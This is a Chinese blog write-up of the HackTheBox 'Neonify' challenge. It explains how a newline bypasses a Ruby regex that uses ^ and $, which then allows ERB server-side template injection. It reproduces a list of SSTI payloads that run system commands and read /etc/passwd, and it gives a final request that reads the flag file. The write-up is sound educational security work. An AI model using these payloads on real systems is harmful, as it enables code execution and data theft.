<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>htb-Neonify | Ak4izZ&#39;s 滴博客儿</title>
  <meta name="author" content="Ak4izZ">
  
  <meta name="description" content="学到了ruby的一个小trick！
通过ruby正则符号^和&amp;amp;对多行输入的处理进行绕过，利用SSTI读flag。"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="htb-Neonify"/>
  <meta property="og:site_name" content="Ak4izZ&#39;s 滴博客儿"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="Ak4izZ&#39;s 滴博客儿" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 5.4.2"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">Ak4izZ&#39;s 滴博客儿</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> htb-Neonify</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p> 学到了ruby的一个小trick！</p>
<p>通过ruby正则符号<code>^</code>和<code>&amp;</code>对多行输入的处理进行绕过，利用SSTI读flag。</p>
<span id="more"></span>

<h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><p>一个很简单的ruby模板，conrollers是</p>
<pre class="line-numbers language-ruby" data-language="ruby"><code class="language-ruby"><span class="token keyword">class</span> <span class="token class-name">NeonControllers</span> <span class="token operator">&lt;</span> Sinatra<span class="token double-colon punctuation">::</span>Base

  configure <span class="token keyword">do</span>
    set <span class="token symbol">:views</span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">"app/views"</span></span>
    set <span class="token symbol">:public_dir</span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">"public"</span></span>
  <span class="token keyword">end</span>

  get <span class="token string-literal"><span class="token string">'/'</span></span> <span class="token keyword">do</span>
    <span class="token variable">@neon</span> <span class="token operator">=</span> <span class="token string-literal"><span class="token string">"Glow With The Flow"</span></span>
    erb <span class="token operator">:</span><span class="token string-literal"><span class="token string">'index'</span></span>
  <span class="token keyword">end</span>

  post <span class="token string-literal"><span class="token string">'/'</span></span> <span class="token keyword">do</span>
    <span class="token keyword">if</span> params<span class="token punctuation">[</span><span class="token symbol">:neon</span><span class="token punctuation">]</span> <span class="token operator">=~</span> <span class="token regex-literal"><span class="token regex">/^[0-9a-z ]+$/i</span></span>
      <span class="token variable">@neon</span> <span class="token operator">=</span> <span class="token class-name">ERB</span><span class="token punctuation">.</span><span class="token keyword">new</span><span class="token punctuation">(</span>params<span class="token punctuation">[</span><span class="token symbol">:neon</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>result<span class="token punctuation">(</span>binding<span class="token punctuation">)</span>
    <span class="token keyword">else</span>
      <span class="token variable">@neon</span> <span class="token operator">=</span> <span class="token string-literal"><span class="token string">"Malicious Input Detected"</span></span>
    <span class="token keyword">end</span>
    erb <span class="token operator">:</span><span class="token string-literal"><span class="token string">'index'</span></span>
  <span class="token keyword">end</span>

<span class="token keyword">end</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>对应的html是</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token doctype"><span class="token punctuation">&lt;!</span><span class="token doctype-tag">DOCTYPE</span> <span class="token name">html</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>head</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>title</span><span class="token punctuation">></span></span>Neonify<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>title</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>link</span> <span class="token attr-name">rel</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>stylesheet<span class="token punctuation">"</span></span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>stylesheets/style.css<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>link</span> <span class="token attr-name">rel</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>icon<span class="token punctuation">"</span></span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>image/gif<span class="token punctuation">"</span></span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>/images/gem.gif<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>head</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>div</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>wrapper<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h1</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>title<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>Amazing Neonify Generator<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h1</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>form</span> <span class="token attr-name">action</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>/<span class="token punctuation">"</span></span> <span class="token attr-name">method</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>post<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
            <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>p</span><span class="token punctuation">></span></span>Enter Text to Neonify<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>p</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>br</span><span class="token punctuation">></span></span>
            <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>text<span class="token punctuation">"</span></span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>neon<span class="token punctuation">"</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span><span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
            <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">type</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>submit<span class="token punctuation">"</span></span> <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>Submit<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>form</span><span class="token punctuation">></span></span>
        <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>h1</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>glow<span class="token punctuation">"</span></span><span class="token punctuation">></span></span>&lt;%= @neon %><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>h1</span><span class="token punctuation">></span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>div</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以看出，POST里的neon参数通过正则判断<code>params[:neon] =~ /^[0-9a-z ]+$/i</code>之后，直接输出到了前端。通过搜索<code>ruby SSTI</code>等字样，可以看到不少结果，看到代码里出现的<code>erb</code>关键字，这题的利用点应该就是它了。</p>
<p><a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby">https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby</a></p>
<p><a target="_blank" rel="noopener" href="https://trustedsec.com/blog/rubyerb-template-injection">https://trustedsec.com/blog/rubyerb-template-injection</a></p>
<p>这是一些利用的payload</p>
<pre class="line-numbers language-ruby" data-language="ruby"><code class="language-ruby"><span class="token operator">&lt;</span><span class="token operator">%=</span> system<span class="token punctuation">(</span><span class="token string-literal"><span class="token string">"whoami"</span></span><span class="token punctuation">)</span> <span class="token string-literal"><span class="token string">%> #Execute code
&lt;%= Dir.entries('/') %></span></span> <span class="token comment">#List folder</span>
<span class="token operator">&lt;</span><span class="token operator">%=</span> <span class="token builtin">File</span><span class="token punctuation">.</span>open<span class="token punctuation">(</span><span class="token string-literal"><span class="token string">'/etc/passwd'</span></span><span class="token punctuation">)</span><span class="token punctuation">.</span>read <span class="token string-literal"><span class="token string">%> #Read file

&lt;%= system('cat /etc/passwd') %></span></span>
<span class="token operator">&lt;</span><span class="token operator">%=</span> <span class="token command-literal"><span class="token command string">`ls /`</span></span> <span class="token string-literal"><span class="token string">%>
&lt;%= IO.popen('ls /').readlines()  %></span></span>
<span class="token operator">&lt;</span><span class="token operator">%</span> <span class="token keyword">require</span> <span class="token string-literal"><span class="token string">'open3'</span></span> <span class="token string-literal"><span class="token string">%>&lt;% @a,@b,@c,@d=Open3.popen3('whoami') %></span></span><span class="token operator">&lt;</span><span class="token operator">%=</span> <span class="token variable">@b</span><span class="token punctuation">.</span>readline<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token string-literal"><span class="token string">%>
&lt;% require 'open4' %></span></span><span class="token operator">&lt;</span><span class="token operator">%</span> <span class="token variable">@a</span><span class="token punctuation">,</span><span class="token variable">@b</span><span class="token punctuation">,</span><span class="token variable">@c</span><span class="token punctuation">,</span><span class="token variable">@d</span><span class="token operator">=</span>Open4<span class="token punctuation">.</span>popen4<span class="token punctuation">(</span><span class="token string-literal"><span class="token string">'whoami'</span></span><span class="token punctuation">)</span> <span class="token string-literal"><span class="token string">%>&lt;%= @c.readline()%></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>关于erb的使用，还有一些小知识</p>
<pre class="line-numbers language-none"><code class="language-none">&lt;% %&gt;
在括号内执行ruby代码。

&lt;%&#x3D; %&gt;
在ERB文件中打印一些东西。

&lt;% -%&gt;
避免在表达式后中断行。

&lt;%# %&gt;
括号内的注释；未发送到客户端(与HTML注释相反)。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>如何绕过正则？既然题这么写，那么 ruby一定有和其他语言处理正则不一样的地方导致了这个漏洞。这里是一些搜索结果</p>
<p><a target="_blank" rel="noopener" href="https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/">Bypassing regular expression checks with a line feed</a></p>
<p><a target="_blank" rel="noopener" href="https://docs.guardrails.io/docs/vulnerabilities/ruby/insecure_use_of_regular_expressions">Insecure Use of Regular Expressions</a></p>
<p>简单来说，在ruby中<code>^</code>和<code>&amp;</code>是用于行正则匹配，当输入是多行时，只要有一行通过了，那么整个输入都会通过，因此<code>^</code>和<code>&amp;</code>最好用<code>\A</code>和<code>\z</code>代替。</p>
<h1 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h1><img src="/2023/11/20/htb-Neonify/image-20231120104422250.png" class title="image-20231120104422250">

<p>可以看到，利用换行我们绕过了正则检查，成功插入代码。使用<code>File.open().read</code>是可以看到文件内容的</p>
<img src="/2023/11/20/htb-Neonify/image-20231120105342897.png" class title="image-20231120105342897">

<p>所以最后payload</p>
<pre class="line-numbers language-none"><code class="language-none">neon&#x3D;123%0a&lt;h1&gt;&lt;%25%3d+File.open(&#39;flag.txt&#39;).read+%25&gt;&lt;&#x2F;h1&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2023/11/20/htb-C-O-P/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2023/11/20/htb-WeatherApp/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2023-11-20 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/hackthebox/">hackthebox<span>4</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/hackthebox/">hackthebox<span>5</span></a></li> <li><a href="/tags/web/">web<span>4</span></a></li> <li><a href="/tags/ruby/">ruby<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E5%88%86%E6%9E%90"><span class="toc-article-text">分析</span></a></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#payload"><span class="toc-article-text">payload</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2023 Ak4izZ's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



</body>
   </html>
